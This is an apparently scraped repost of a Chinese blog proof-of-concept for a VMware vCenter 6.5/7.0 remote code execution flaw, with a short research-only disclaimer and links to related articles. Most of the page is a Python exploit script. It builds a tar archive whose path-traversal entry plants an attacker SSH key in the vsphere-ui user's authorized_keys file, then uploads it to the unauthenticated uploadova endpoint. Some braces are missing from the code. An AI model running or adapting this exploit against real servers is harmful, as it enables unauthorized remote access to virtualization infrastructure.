[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution

Posted 鸿渐之翼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution相关的知识,希望对你有一定的参考价值。

免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。

import tarfile
import os
from io import BytesIO
import requests

proxies = 
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",

def return_zip():
    with tarfile.open("test.tar", 'w') as tar:
        payload = BytesIO()
        id_rsa_pub = 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwgGuwNdSGHKvzHsHt7QImwwJ08Wa/+gHXOt+VwZTD23rLwCGVeYmfKObDY0uFfe2O4jr+sPamgA8As4LwdqtkadBPR+EzZB+PlS66RcVnUnDU4UdMhQjhyj/uv3pdtugugJpB9xaLdrUWwGoOLYA/djxD5hmojGdoYydBezsNhj2xXRyaoq3AZVqh1YLlhpwKnzhodk12a7/7EU+6Zj/ee5jktEwkBsVsDLTTWPpSnzK7r+kAHkbYx8fvO3Fk+9jlwadgbmhHJrpPr8gLEhwvrEnPcK1/j+QXvVkgy2cuYxl9GCUPv2wgZCN50f3wQlaJiektm2S9WkN5dLDdX+X4w=='
        tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
        f1 = BytesIO(id_rsa_pub.encode())
        tarinfo.size = len(f1.read())
        f1.seek(0)
        tar.addfile(tarinfo, fileobj=f1)
        tar.close()
        payload.seek(0)
def getshell(url):
    files = 'uploadFile':open('test.tar','rb')
    try:
        r = requests.post(url=url, files=files,proxies=proxies,verify = False).text
        print(r)
    except:
        print('flase')

if __name__ == "__main__":
    try:
        return_zip()
        url="https://192.168.1.1/ui/vropspluginui/rest/services/uploadova"
        getshell(url)
    except IOError as e:
        raise e


以上是关于[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution的主要内容,如果未能解决你的问题,请参考以下文章

[POC分享]CVE: 2021-21972:VMware vCenter Server 7.0 - Unauthenticated File Upload

[POC分享]VMware vCenter Server 7.0 未经身份验证的文件上传

[POC分享]VMware vCenter Server 7.0 未经身份验证的文件上传

vmware vsphere 6.5不能进vcenter

VMware vSphere ESX 6.5 and vCenter 6.5 Configuration Maximums

VMware vCenter Server 6.5安装